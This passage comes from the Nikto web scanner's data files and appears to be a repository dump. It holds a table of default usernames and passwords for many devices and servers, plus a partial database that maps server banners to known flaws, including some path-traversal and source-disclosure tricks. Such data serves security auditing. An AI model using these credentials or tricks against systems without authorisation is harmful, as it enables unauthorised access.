    "content": "#VERSION,2.002\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n# format: realm,id,password,message\n# @ANY = match any realm name (generic)\n# If ID and PW fields are blank, realm match is used for message only\n########################################################################\n\"nikto_id\",\"realm\",\"id\",\"password\",\"message\"\n\"700000\",\"@ANY\",\"\",\"_Cisco\",\"Cisco device\"\n\"700001\",\"@ANY\",\"\",\"0\",\"Accton wireless router\"\n\"700002\",\"@ANY\",\"\",\"0000\",\"Deutsche Telekomm T-Sinus 130 DSL\"\n\"700003\",\"@ANY\",\"\",\"00000000\",\"Konica/Minolta Di 2010f\"\n\"700004\",\"@ANY\",\"\",\"12345\",\"US Robotics modem\"\n\"700005\",\"@ANY\",\"\",\"admin\",\"Generic account discovered\"\n\"700006\",\"@ANY\",\"\",\"Administrative\",\"Avenger News System\"\n\"700007\",\"@ANY\",\"\",\"cisco\",\"Cisco device\"\n\"700008\",\"@ANY\",\"\",\"Cisco\",\"Cisco device\"\n\"700009\",\"@ANY\",\"\",\"connect\",\"Fujitsu Siemens\"\n\"700010\",\"@ANY\",\"\",\"epicrouter\",\"Conexant Router\"\n\"700011\",\"@ANY\",\"\",\"intermec\",\"Intermec EasyLAN\"\n\"700012\",\"@ANY\",\"\",\"PASSWORD\",\"Kyocera EcoLink\"\n\"700013\",\"@ANY\",\"\",\"password\",\"NRG/Ricoh printer\"\n\"700014\",\"@ANY\",\"\",\"smcadmin\",\"SMC Router\"\n\"700015\",\"@ANY\",\"\",\"Symbol\",\"Symbol Spectrum\"\n\"700016\",\"@ANY\",\"\",\"TANDBERG\",\"Tandberg device\"\n\"700017\",\"@ANY\",\"\",\"x6zynd56\",\"Polycom ViewStation\"\n\"700018\",\"@ANY\",\"1502\",\"1502\",\"X-Micro WLAN 11b router\"\n\"700019\",\"@ANY\",\"admin\",\"\",\"Generic account discovered\"\n\"700020\",\"@ANY\",\"admin\",\"0000\",\"Infosmart SOHO router\"\n\"700021\",\"@ANY\",\"admin\",\"1111\",\"Xerox WorkCentre Pro\"\n\"700022\",\"@ANY\",\"admin\",\"1234\",\"Generic account discovered\"\n\"700023\",\"@ANY\",\"admin\",\"1234\",\"ZyXEL Prestige\"\n\"700024\",\"@ANY\",\"admin\",\"22222\",\"Xerox DocuCentre 425\"\n\"700025\",\"@ANY\",\"admin\",\"admin\",\"Generic account discovered.\"\n\"700026\",\"@ANY\",\"admin\",\"administrator\",\"Efficient Speedstream\"\n\"700027\",\"@ANY\",\"admin\",\"articon\",\"Blue Coat systems\"\n\"700028\",\"@ANY\",\"admin\",\"asd\",\"NGSec NGSecureWeb\"\n\"700029\",\"@ANY\",\"admin\",\"barney\",\"Avaya SIP telephone\"\n\"700030\",\"@ANY\",\"admin\",\"barricade\",\"SMC Barricade 7401BRA\"\n\"700031\",\"@ANY\",\"admin\",\"demo\",\"OpenMarket Content Server\"\n\"700032\",\"@ANY\",\"admin\",\"epicrouter\",\"Generic account discovered\"\n\"700033\",\"@ANY\",\"admin\",\"hagpolm1\",\"Siemens SpeedStream 4100\"\n\"700034\",\"@ANY\",\"admin\",\"hp.com\",\"Hewlett-Packard webmin\"\n\"700035\",\"@ANY\",\"Admin\",\"ImageFolio\",\"BizDesign ImageFolio\"\n\"700036\",\"@ANY\",\"admin\",\"ironport\",\"IronPrt C30\"\n\"700037\",\"Motive Chorus\",\"admin\",\"isee\",\"Hewlett-Packard Motive Chorus\"\n\"700038\",\"@ANY\",\"admin\",\"linga\",\"Alteon ACEswitch 180e\"\n\"700039\",\"@ANY\",\"admin\",\"motorola\",\"Motorola wireless router\"\n\"700040\",\"@ANY\",\"admin\",\"mp3mystic\",\"MP3Mystic\"\n\"700041\",\"@ANY\",\"admin\",\"muze\",\"Muze Ariadne\"\n\"700042\",\"@ANY\",\"admin\",\"netadmin\",\"Enterasys ANG-1105\"\n\"700043\",\"@ANY\",\"admin\",\"operator\",\"iPSTAR Satellite\"\n\"700044\",\"@ANY\",\"admin\",\"password\",\"Generic account discovered\"\n\"700045\",\"@ANY\",\"admin\",\"secure\",\"Generic account discovered\"\n\"700046\",\"@ANY\",\"admin\",\"setup\",\"Nortel Contivity\"\n\"700047\",\"@ANY\",\"admin\",\"smallbusiness\",\"Pirelli AGE-SB\"\n\"700048\",\"@ANY\",\"admin\",\"smcadmin\",\"SMC Barricade 7204BRB\"\n\"700049\",\"@ANY\",\"admin\",\"synnet\",\"3COM CellPlex\"\n\"700050\",\"@ANY\",\"admin\",\"TANDBERG\",\"Tandberg device\"\n\"700051\",\"@ANY\",\"admin\",\"tomcat\",\"Apache Tomcat\"\n\"700052\",\"@ANY\",\"admin@example.com\",\"admin\",\"MySQL Eventum\"\n\"700053\",\"@ANY\",\"Administrator\",\"\",\"Generic account discovered\"\n\"700054\",\"@ANY\",\"administrator\",\"**#\",\"Polycom Soundstation IP\"\n\"700055\",\"@ANY\",\"Administrator\",\"0000\",\"Snom VoIP business phone\"\n\"700056\",\"@ANY\",\"Administrator\",\"1234\",\"Integrated Networks IP Phone\"\n\"700057\",\"@ANY\",\"administrator\",\"1234\",\"IntelliTouch Voip Broadband phone\"\n\"700058\",\"@ANY\",\"Administrator\",\"12345678\",\"Integrated Networks IP Phone\"\n\"700059\",\"@ANY\",\"Administrator\",\"19750407\",\"Luxon Communications/Integrated Networks IP Phone\"\n\"700060\",\"@ANY\",\"Administrator\",\"admin\",\"Generic account discovered\"\n\"700061\",\"@ANY\",\"administrator\",\"administrator\",\"Compaq WBEM\"\n\"700062\",\"@ANY\",\"administrator\",\"administrator\",\"Generic account discovered.\"\n\"700063\",\"@ANY\",\"administrator\",\"adminpass\",\"NessusWeb\"\n\"700064\",\"@ANY\",\"AdvWebadmin\",\"advcomm500349\",\"Hosting Controller\"\n\"700065\",\"@ANY\",\"anonymous\",\"\",\"Sambar Server\"\n\"700066\",\"@ANY\",\"apc\",\"apc\",\"APC UPS\"\n\"700067\",\"@ANY\",\"billy-bob\",\"\",\"Sambar Server\"\n\"700068\",\"@ANY\",\"Bobo\",\"hello\",\"OpenMarket Content Server\"\n\"700069\",\"@ANY\",\"cac_admin\",\"cacadmin\",\"Openwave MSP\"\n\"700070\",\"@ANY\",\"Cisco\",\"Cisco\",\"Cisco device\"\n\"700071\",\"@ANY\",\"Coco\",\"hello\",\"OpenMarket Content Server\"\n\"700072\",\"@ANY\",\"customer\",\"\",\"Aspect ACD\"\n\"700073\",\"@ANY\",\"device\",\"device\",\"APC UPS\"\n\"700074\",\"@ANY\",\"e250\",\"e250changeme\",\"Network Associates WebShield Security Appliance e250\"\n\"700075\",\"@ANY\",\"e500\",\"e500changeme\",\"Network Associates WebShield Security Appliance e500\"\n\"700076\",\"@ANY\",\"Flo\",\"hello\",\"OpenMarket Content Server\"\n\"700077\",\"@ANY\",\"ftp\",\"\",\"Sambar Server\"\n\"700078\",\"@ANY\",\"guest\",\"\",\"Generic account discovered\"\n\"700079\",\"@ANY\",\"guest\",\"guest\",\"Generic account discovered.\"\n\"700080\",\"@ANY\",\"intel\",\"intel\",\"Intel wireless gateway\"\n\"700081\",\"@ANY\",\"jagadmin\",\"\",\"Sybase EAServer\"\n\"700082\",\"@ANY\",\"Jetform\",\"\",\"Jetform Design\"\n\"700083\",\"@ANY\",\"Joe\",\"hello\",\"OpenMarket Content Server\"\n\"700084\",\"@ANY\",\"LDAP_Anonymous\",\"LdapPassword_1\",\"Microsoft SiteServer\"\n\"700085\",\"@ANY\",\"manager\",\"admin\",\"Allied Telesyn switch\"\n\"700086\",\"@ANY\",\"Manager\",\"fried\",\"Allied Telesyn router\"\n\"700087\",\"@ANY\",\"Moe\",\"hello\",\"OpenMarket Content Server\"\n\"700088\",\"@ANY\",\"naadmin\",\"naadmin\",\"NetGenesis NetAnalysis Web Reporting\"\n\"700089\",\"@ANY\",\"operator\",\"\",\"Magicolor 3100\"\n\"700090\",\"@ANY\",\"operator\",\"$schwarzepumpe\",\"Intershop\"\n\"700091\",\"@ANY\",\"piranha\",\"piranha\",\"Redhat 6.2\"\n\"700092\",\"@ANY\",\"piranha\",\"q\",\"Redhat 6.2\"\n\"700093\",\"@ANY\",\"Polycom\",\"SpIp\",\"Polycom Soundpoint VoIP phones\"\n\"700094\",\"@ANY\",\"public\",\"public\",\"Samsung Router\"\n\"700095\",\"@ANY\",\"role\",\"changethis\",\"Apache Tomcat\"\n\"700096\",\"@ANY\",\"role1\",\"role1\",\"Apache Tomcat\"\n\"700097\",\"@ANY\",\"Root\",\"\",\"3COM Netbuilder\"\n\"700098\",\"@ANY\",\"root\",\"\",\"Generic account discovered\"\n\"700099\",\"@ANY\",\"root\",\"calvin\",\"Dell Remote Access Card\"\n\"700100\",\"@ANY\",\"root\",\"changeme\",\"Sun Microsystems ILOM/X4100\"\n\"700101\",\"@ANY\",\"root\",\"changethis\",\"Apache Tomcat\"\n\"700102\",\"@ANY\",\"tomcat\",\"s3cret\",\"Apache Tomcat\"\n\"700103\",\"@ANY\",\"root\",\"Cisco\",\"Cisco device\"\n\"700104\",\"@ANY\",\"root\",\"nsi\",\"NSI vmXfw\"\n\"700105\",\"@ANY\",\"root\",\"pass\",\"Axis Webcams\"\n\"700106\",\"@ANY\",\"root\",\"password\",\"BestPractical RT\"\n\"700107\",\"@ANY\",\"root\",\"root\",\"Apache Tomcat\"\n\"700108\",\"@ANY\",\"root\",\"root\",\"Generic account discovered\"\n\"700109\",\"@ANY\",\"root\",\"tslinux\",\"Cyclades TS800\"\n\"700110\",\"@ANY\",\"sadmin\",\"\",\"Novell NDS iMonitor\"\n\"700111\",\"@ANY\",\"smc\",\"smcadmin\",\"SMC Barricade 7401BRA\"\n\"700112\",\"@ANY\",\"storwatch\",\"specialist\",\"IBM TotalStorage\"\n\"700113\",\"@ANY\",\"super\",\"5777364\",\"Netgear wireless gateway\"\n\"700114\",\"@ANY\",\"superadmin\",\"secret\",\"IBM Web administration tool\"\n\"700115\",\"@ANY\",\"superman\",\"21241036\",\"Netgear wireless gateway\"\n\"700116\",\"@ANY\",\"superuser\",\"admin\",\"Efficient Speedstream\"\n\"700117\",\"@ANY\",\"supervisor\",\"PlsChgMe\",\"Nortel Business Communications Manager\"\n\"700118\",\"@ANY\",\"support\",\"h179350\",\"Psion Teklogix 9150\"\n\"700119\",\"@ANY\",\"sys\",\"uplink\",\"Openwave WAP gateway\"\n\"700120\",\"@ANY\",\"sysadmin\",\"password\",\"Ricoh Aficio\"\n\"700121\",\"@ANY\",\"system\",\"password\",\"Mitel 3300 ICP\"\n\"700122\",\"@ANY\",\"test\",\"test\",\"Generic account discovered.\"\n\"700123\",\"@ANY\",\"tomcat\",\"changethis\",\"Apache Tomcat\"\n\"700124\",\"@ANY\",\"tomcat\",\"tomcat\",\"Apache Tomcat\"\n\"700125\",\"@ANY\",\"user_analyst\",\"demo\",\"OpenMarket Content Server\"\n\"700126\",\"@ANY\",\"user_approver\",\"demo\",\"OpenMarket Content Server\"\n\"700127\",\"@ANY\",\"user_author\",\"demo\",\"OpenMarket Content Server\"\n\"700128\",\"@ANY\",\"user_checker\",\"demo\",\"OpenMarket Content Server\"\n\"700129\",\"@ANY\",\"user_designer\",\"demo\",\"OpenMarket Content Server\"\n\"700130\",\"@ANY\",\"user_editor\",\"demo\",\"OpenMarket Content Server\"\n\"700131\",\"@ANY\",\"user_expert\",\"demo\",\"OpenMarket Content Server\"\n\"700132\",\"@ANY\",\"user_marketer\",\"demo\",\"OpenMarket Content Server\"\n\"700133\",\"@ANY\",\"user_pricer\",\"demo\",\"OpenMarket Content Server\"\n\"700134\",\"@ANY\",\"user_publisher\",\"demo\",\"OpenMarket Content Server\"\n\"700135\",\"@ANY\",\"user\",\"\",\"D-Link router\"\n\"700136\",\"@ANY\",\"User\",\"\",\"D-Link router\"\n\"700137\",\"@ANY\",\"webadmin\",\"1234\",\"ZyXEL Prestige\"\n\"700138\",\"@ANY\",\"webadmin\",\"webadmin\",\"Broadlogic XLT router\"\n\"700139\",\"@ANY\",\"websecadm\",\"changeme\",\"Entrust getAccess\"\n\"700140\",\"ConfigToolPassword\",,,\"Realm matches a Nokia Checkpoint Firewall-1\"\n\"700141\",\"daap\",\"\",\"\",\"DAAP (iTunes?) server with authentication.\"\n\"700142\",\"EIC\",\"root\",\"ncr\",\"Enterprise Intranet Configurator - NCR Teradata server\"\n\"700143\",\"Entrust GetAccess SCA\",\"admin\",\"admin\",\"Entrust GetAccess Service Control Agent\"\n\"700144\",\"hp print server appliance\",\"admin\",\"admin\",\"HP Print Server\"\n\"700145\",\"InterScanVirusWall\",\"admin\",\"admin\",\"Trend Micro's InterScan Virus Wall\"\n\"700146\",\"Monitor or Admin\",\"admin\",\"\",\"StorageTek's StorageNet, ID 'admin' with no password\"\n\"700147\",\"Monitor or Admin\",\"monitor\",\"\",\"StorageTek's StorageNet, ID monitor' with no password\"\n\"700148\",\"Netscape Administration\",\"admin\",\"admin\",\"Netscape server administration\"\n\"700149\",\"Netscape Mission Control\",\"admin\",\"admin\",\"Netscape server administration\"\n\"700150\",\"Topaz Prism Site\",\"admin\",\"admin\",\"Topaz Prism monitoring from Mercurity Interactive\"\n\"700151\",\"Topaz Site Realm\",\"admin\",\"admin\",\"Mercury Interactive Topaz administrator\"\n\"700152\",\"UpgradeAdministrator\",\"admin\",\"ncr\",\"NCR's Terradata server, Parallel Upgrade Tool (PUT)\"\n\"700153\",\"@ANY\",\"manager\",\"manager\",\"3com switch/Apache Tomcat\"\n\"700154\",\"Linksys WAG160N \",\"\",\"admin\",\"Wireless-N ADSL2+ Gateway WAG160N\"\n\"700155\",\"@ANY\",\"tomcat\",\"\",\"Apache Tomcat\"\n\"700156\",\"@ANY\",\"j2deployer\",\"j2deployer\",\"Apache Tomcat\"\n\"700157\",\"@ANY\",\"ovwebusr\",\"OvW*busr1\",\"Apache Tomcat\"\n\"700158\",\"@ANY\",\"cxsdk\",\"kdsxc\",\"Apache Tomcat\"\n\"700159\",\"@ANY\",\"root\",\"owaspbwa\",\"Apache Tomcat\"\n\"700160\",\"@ANY\",\"ADMIN\",\"ADMIN\",\"Apache Tomcat\"\n\"700161\",\"@ANY\",\"xampp\",\"xampp\",\"Apache Tomcat\"\n\"700162\",\"@ANY\",\"QCC\",\"QLogic66\",\"Apache Tomcat\"\n\"700163\",\"@ANY\",\"both\",\"tomcat\",\"Apache Tomcat\"\n\"700164\",\"@ANY\",\"role1\",\"tomcat\",\"Apache Tomcat\"\n\"700165\",\"@ANY\",\"admin\",\"changethis\",\"Apache Tomcat\"\n\"700166\",\"SPIP Configuration\",\"Polycom\",\"456\",\"Polycom SoundStation/SoundPoint IP\"\n\"700167\",\"@ANY\",\"username\",\"password\",\"ComfortableMexicanSofa CMS Engine\"\n\"700168\",\"OSGi Management Console\",\"admin\",\"admin\",\"Adobe Experience Manager default password found\"\n\"700169\",\"Power+ (default: admin/admin)\",\"admin\",\"admin\",\"Gamatronic Power+ default password found\"\n"
  },
  {
    "path": "nikto/program/databases/db_server_msgs",
    "content": "#VERSION,2.006\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n# NiktoDB 1.0\n# Example to get the server-message:\n#   ~$ curl --head --silent www.example.com | grep --ignore-case server\n#######################################################################\n\"nikto_id\",\"server\",\"osvdb\",\"message\"\n\"800000\",\"4D_WebSTAR_S\\/5\\.([0-2]|3\\.[0-2])\",\"7794\",\"May be vulnerable to multiple flaws. http://secunia.com/advisories/12063/\"\n\"800001\",\"4D_WebSTAR_S\\/5\\.([0-2]|3\\.[01])\",\"0\",\"May be vulnerable to denial of service threw openssl implementation bug. http://secunia.com/advisories/11181/\"\n\"800002\",\"4D_WebSTAR_S\\/5\\.([0-3]|4[^.])\",\"16154\",\"May be vulnerable to a buffer overflow in tomcat plugin URL. http://secunia.com/advisories/15278/\"\n\"800003\",\"4D_WebSTAR_S\\/5\\.3\\.1\",\"2542\",\"May be vulnerable to remote exploitable buffer overflow. http://secunia.com/advisories/9723/\"\n\"800004\",\"Abyss\\/1\\.0\\.3\",\"5237\",\"May be vulnerable to directory traversal by using '%5c%2e%2e%5c' type paths.\"\n\"800005\",\"ADSM_HTTP\\/\",\"0\",\"May be Tivoli server administration. Default account is admin/admin.\"\n\"800006\",\"Acme.Serve/v1.7 of 13nov96\",\"0\",\"Java class Acme.Serve.Serve is used as an embedded server for many devices, including APC InfraStruXure Manager. This server string is the default for the servlet. Check for port 9090, which may have a browsable c:\\ drive. See: http://www.acme.com/java/software/Acme.Serve.Serve.html\"\n\"800007\",\"AdSubtract\",\"0\",\"Adsubtract.com, a Windows proxy which removes popup ads, can be configure for remote access or localhost only.\"\n\"800008\",\"Agranat-EMWeb\",\"0\",\"Most likely a printer.\"\n\"800009\",\"alibaba\",\"10\",\"http://alibaba.austria.eu.net/ This server has lots of problems (overflows, etc)\"\n\"800010\",\"Allegro-Software-RomPager\",\"0\",\"Most likely a printer.\"\n\"800011\",\"allegro-software\",\"0\",\"Most often a printer or other embedded device\"\n\"800012\",\"american sitebuilder\",\"0\",\"http://www.american.com/product1.html\"\n\"800013\",\"aolserver\",\"0\",\"http://www.aolserver.com/ runs on Dec OSF1\"\n\"800014\",\"Apache Tomcat\\/4\\.(0\\.[1-4]|1\\.[0-9][^0-9]|1\\.10)\",\"8773\",\"May be vulnerable to JSP source code exposure. CAN-2002-1148.\"\n\"800015\",\"Apache Tomcat\\/4\\.0\\.3\",\"5051\",\"Apache Tomcat 4.0.3 Win 2000 server is vulnerable to a DoS attack. Upgrade to a 4.1.3beta or higher.\"\n\"800016\",\"apache-ssl-us\",\"0\",\"http://apachessl.c2.net\"\n\"800017\",\"Apache\\/.* Ben-SSL\\/1\\.([0-9][^0-9]|[0-3][0-9]|4[0-6])[^0-9]\",\"0\",\"This version of Apache-SSl is vulnerable to a buffer overflow.\"\n\"800018\",\"Apache\\/(1\\.2\\.([2-9].*|1[0-9])|1\\.3\\.([0-1].*|2[0-4]))\",\"838\",\"Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.\"\n\"800019\",\"Apache\\/1\\.0\\.3\",\"0\",\"Probably a Xerox printer\"\n\"800020\",\"Apache\\/1\\.1\\.1\",\"0\",\"May be able view directory contents regardless of index.html\"\n\"800021\",\"Apache\\/1\\.1\\.3\",\"9717\",\"This version has a mod_cookies buffer overflow\"\n\"800022\",\"Apache\\/1\\.3\\.(0.*|1.*|2[0-6])\",\"4552\",\"Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.\"\n\"800023\",\"Apache\\/1\\.3\\.(0.*|1.*|2[0-8])\",\"2733\",\"Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.\"\n\"800024\",\"Apache\\/1\\.3\\.27\",\"9715\",\"Windows and OS/2 version vulnerable to remote exploit. CAN-2003-0460\"\n\"800025\",\"Apache\\/2\\.0\\.([0-2].*|3.*)\",\"859\",\"Apache 2.0 to 2.0.39 Windows may be vulnerable to arbitrary file retrieval. CAN-2002-0661.\"\n\"800026\",\"Apache\\/2\\.0\\.([0-2].*|3[0-8])\",\"838\",\"Apache 2.0 up 2.0.36 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.\"\n\"800027\",\"Apache\\/2\\.0\\.([0-3].*|4.[0-8])\",\"2733\",\"Apache 2.0 to 2.0.48: overflows in mod_alias and mod_rewrite (OSVDB-2733, OSVDB-7611), mod_cgid may send the output of CGI to the incorrect client (OSVDB-15889).\"\n\"800028\",\"Apache\\/2\\.0\\.([0-3].*|4[0-6])\",\"2672\",\"Apache 2.0 up 2.0.46 are vulnerable to multiple remote problems. CAN-2003-0192. CAN-2003-0253. CAN-2003-0254. CERT VU#379828.\"\n\"800029\",\"Apache\\/2\\.0\\.([0-3].*|4[0-7])\",\"15889\",\"Apache 2.0 up 2.0.47 are vulnerable to multiple remote problems in mod_rewrite and mod_cgi. CAN-2003-0789. CAN-2003-0542.\"\n\"800030\",\"Apache\\/2\\.0\\.([0-4].*|5\\.[0-1])\",\"9994\",\"Apache 2.0 to 2.0.51 contain multiple problems: overflow in apr-util (OSVDB-9994), config file variable overflow (OSVDB-9991), indirect lock refresh DoS (OSVDB-9948), SSL input filter DoS (OSVDB-9742), potential infinite loop (OSVDB-9523).\"\n\"800031\",\"Apache\\/2\\.0\\.([0-4].*|5\\.[0-2])\",\"10218\",\"Apache 2.0 to 2.0.52 could allow bypassing of authentication via the Satisfy directive. CAN-2004-0811. OSVDB-10218.\"\n\"800032\",\"Apache\\/2\\.0\\.([0-4].*|5\\.[0-3])\",\"10637\",\"Apache 2.0 to 2.0.53 allows bypassing of an SSLCipherSuite setting. CAN-2004-0885. OSVDB-10637. Also contains a memory exhaustion DoS through MIME folded requests. CAN-2004-0942. OSVDB-11391\"\n\"800033\",\"Apache\\/2\\.0\\.([0-4].*|5\\.0)\",\"6472\",\"Apache 2.0 to 2.0.50 contain a buffer overflow in FakeBasicAuth with trusted client certificates. CAN-2004-0488. OSVDB-6472. Also a DoS with certain input data. CAN-2004-0493. OSVDB-7269.\"\n\"800034\",\"Apache\\/2\\.0\\.(3[7-9]|4[0-5])\",\"0\",\"Apache versions 2.0.37 through 2.0.45 are vulnerable to a DoS in mod_dav. CAN-2003-0245.\"\n\"800035\",\"Apache\\/2\\.0\\.[0-4].*\",\"0\",\"Apache 2.0 to 2.0.49: memory leak in plain-HTTP-on-SSL-port handling (OSVDB-4182), a DoS with short-lived connections on rarely-accessed sockets (OSVDB-4383), and may allow unescaped data into logfiles (OSVDB-4382).\"\n\"800036\",\"Apache\\/2\\.0\\.4[0-5]\",\"0\",\"Apache versions 2.0.40 through 2.0.45 are vulnerable to a DoS in basic authentication. CAN-2003-0189.\"\n\"800037\",\"Apache\\/2\\.0\\.43\",\"0\",\"Win9x and ME servers allow arbitrary code execution, DoS and/or arbitrary file retrieval. CAN-2003-0016. CAN-2003-0017.\"\n\"800038\",\"Apache\\/2\\.0\\.44\",\"0\",\"Apache 2.0.44 is vulnerable to a DoS when linefeed characters are submitted consecutively. CAN-2003-0132.\"\n\"800039\",\"apachejserv\\/1\\.(0|1\\.[0-1])\",\"0\",\"This version of Apache JServ allows files to be retrieved and possibly executed from outside the web root. CAN-2001-0307.\"\n\"800040\",\"aserve\",\"0\",\"http://www.phone.net/aws\"\n\"800041\",\"ATPhttpd\",\"0\",\"http://www.redshift.com/~yramin/atp/atphttpd/ V0.4 contains a DoS by sending a GET 3000 chars long (many times). See securityoffice.net. Also see http://bespin.org/~qitest1 for more bugs/patches.\"\n\"800042\",\"avenida\",\"0\",\"http://www.avenida.co.uk/\"\n\"800043\",\"Avirt\",\"0\",\"Check www.avirt.com for updates, some versions of the proxies have buffer overflows that allow attackers to run arbitrary commands.\"\n\"800044\",\"awhttpd\",\"0\",\"http://pulsar.systes.net/awhttpd/ v2.2 has a local DoS if a user has write access to the HTML directory, see http://sec.angrypacket.com for more info.\"\n\"800045\",\"BadBlue\\/([0-1].*|2\\.[0-9]{1}|2\\.1[0-5]{1})\",\"0\",\"BadBlue Web server 2.15 allow remote users to execute commands on the machine. http://www.badblue.com/\"\n\"800046\",\"BadBlue\\/(0\\..*|1\\.([0-6].*|7\\.0))\",\"0\",\"BadBlue Web server 1.7.0 and below allows directories to be listed by appending a unicode % to the end of a string. http://www.badblue.com/\"\n\"800047\",\"bkhttp\\/0.3\",\"0\",\"BitKeeper may allow anyone to execute arbitrary commands on the remote system. See http://www.securiteam.com/securitynews/5TP0D0K8UQ.html.\"\n\"800048\",\"Blazix\\/1\\.2\\.1\",\"0\",\"Can view JSP source by appending a + to the end of the request.\"\n\"800049\",\"boa\",\"0\",\"http://www.boa.org/\"\n\"800050\",\"boulevard\",\"0\",\"http://www.resnova.com/boulevard\"\n\"800051\",\"Brickserver Modifications\",\"0\",\"May be vulnerable to %2f type directory listing vulnerabilities if the directory contains an index.shtml but not index.html file.\"\n\"800052\",\"cpaneld\",\"0\",\"This is a web hosting manager. It should not be running unless required, as it allows web server administration.\"\n\"800053\",\"cern\",\"0\",\"http://www.w3.org/hypertext/WWW/Daemon\"\n\"800054\",\"ChaiServer\",\"0\",\"HP printer.\"\n\"800055\",\"Cherokee\\/0\\.2\\.7\",\"0\",\"This version of Cherokee allows arbitrary files to be retrieved remotely. See http://www.securitytracker.com/alerts/2001/Dec/1003074.html\"\n\"800056\",\"cisco ios\",\"0\",\"Cisco Catalyst Switch\"\n\"800057\",\"cisco-CPA\",\"0\",\"Most likely a router/switch web management port\"\n\"800058\",\"cl-http\",\"0\",\"http://www.ai.mit.edu/projects/iiip/doc/cl-http/home-page.html\"\n\"800059\",\"Cobalt\",\"0\",\"Cobalt RaQ system\"\n\"800060\",\"commerce-builder\",\"0\",\"http://www.ifact.com/\"\n\"800061\",\"CompaqHTTPServer\",\"0\",\"Has had a few remote DoS issues. Can also give a lot of system information, especially if anonymous access enabled.\"\n\"800062\",\"cosmos\",\"0\",\"http://www.ris.fr/\"\n\"800063\",\"DeleGate\\/\",\"0\",\"www.globalintersec.com has found multiple vulnerabilities in the DeleGate proxies and recommends using Squid or another proxy device as the author(s) have not fixed previous versions.\"\n\"800064\",\"DeleGate\\/7\\.7\\.[0-1]\",\"0\",\"DeleGate 7.7.1 & 7.7.0 are vulnerable to CSS.\"\n\"800065\",\"dwhttpd\",\"0\",\"Probably Sun Microsystem's AnswerBook server. v3.1a4, 4.0.2a7a and 4.1a6 have problems.\"\n\"800066\",\"dwhttpd\\/4\\.(0\\.2a7a|1a6)\",\"0\",\"May allow unauthorized users to add administrators or view logs remotely.\"\n\"800067\",\"Embedded HTTP Server\",\"0\",\"Likely this is a D-Link SoHo router.\"\n\"800068\",\"emwac\",\"0\",\"http://emwac.ed.ac.uk/\"\n\"800069\",\"enterpriseweb\",\"0\",\"http://www.beyond-software.com/products/eweb/eweb.html\"\n\"800070\",\"Eserv\\/2\\.97\",\"0\",\"Server allows pass protected directories to be retrieved by prepending '/./' to it, ie http://server/./protected/, or directory listings by appending ?\"\n\"800071\",\"Essentia\\/2\\.1\",\"0\",\"Essentia 2.1 is vulnerable to directory traversal problems with /../ type requests, along with a DoS on long (2000 chars) requests.\"\n\"800072\",\"Ews/\",\"0\",\"Probably a printer.\"\n\"800073\",\"falcon\",\"0\",\"May allow ../../ file system browsing\"\n\"800074\",\"fnord\",\"0\",\"Win 32 platform\"\n\"800075\",\"Folkweb\",\"0\",\"Win 32 platform\"\n\"800076\",\"frontier\",\"0\",\"http://www.frontiertech.com/products/superweb.htm\"\n\"800077\",\"frontpage\",\"0\",\"http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html\"\n\"800078\",\"^ghttpd\\/1\\.[0-4]\",\"0\",\"The Ghttpd server may contain a remote buffer overflow. Upgrade to the latest version.\"\n\"800079\",\"glaci\",\"0\",\"Netware web server\"\n\"800080\",\"GoAhead-Webs\",\"0\",\"This may be a Cyclade, http://www.cyclades.com/\"\n\"800081\",\"GoAhead-Webs\\/2\\.(0.*|1)\",\"0\",\"GoAhead-Webs 2.1 and below is vulnerable to command execution through a buffer overflow. See http://www.securiteam.com for details.\"\n\"800082\",\"Gordian Embedded\",\"0\",\"Lantronix device, may give system/networking information freely. Could be an access badge reader/card swipe.\"\n\"800083\",\"goserve\",\"0\",\"http://www2.hursley.ibm.com/goserve\"\n\"800084\",\"gosite\",\"0\",\"http://www.gosite.com/\"\n\"800085\",\"GWS\\/\",\"0\",\"Could be the Google Web Server. 2.0 seems to be current.\"\n\"800086\",\"hellbent java webserver v0.1\",\"0\",\"This version of the server is vulnerable to a path disclosure bug and can allow attackers to view .prefs files under certain circumstances. Upgrade to 0.11 or higher. See http://www.securityfocus.com/archive/82/73778\"\n\"800087\",\"homedoor\",\"0\",\"http://www.opendoor.com/\"\n\"800088\",\"HP-Web-Server\",\"0\",\"HP Printer\"\n\"800089\",\"hyperwave\",\"0\",\"http://www.hyperwave.com/\"\n\"800090\",\"i\\/net\",\"0\",\"http://www.inetmi.com/\"\n\"800091\",\"ibm internet connection server\",\"0\",\"http://www.ics.raleigh.ibm.com\"\n\"800092\",\"IBM-HTTP-Server\\/1\\.0\",\"0\",\"This IBM web server allows file source to be viewed by adding a '/' to the URI, like http://server/index.jsp/\"\n\"800093\",\"icecast/1\\.3\\.(7|8.*beta[0-2])\",\"0\",\"This version of Icecast may allow an attacker to execute commands on the server with a format string attack.\"\n\"800094\",\"iis\\/4\",\"0\",\"May be able to bypass security settings using 8.3 file names. ESB-98.015.\"\n\"800095\",\"Intrusion\\/\",\"0\",\"The server may be running Tripwire for web pages. This can allow attackers to gain sensitive information about the web setup.\"\n\"800096\",\"Ipswitch-IMail\\/7\\.11\",\"0\",\"May be vulnerable to a remote command execution overflow, see http://online.securityfocus.com/archive/1/284465\"\n\"800097\",\"Jaguar Server\",\"0\",\"Probably a Sybase web interface\"\n\"800098\",\"jakarta-tomcat-4.0.1\",\"0\",\"Server will reveal path\"\n\"800099\",\"JavaWebServer\",\"0\",\"Probably Sun Microsystem's servlet interface. May have default code which is exploitable. Try 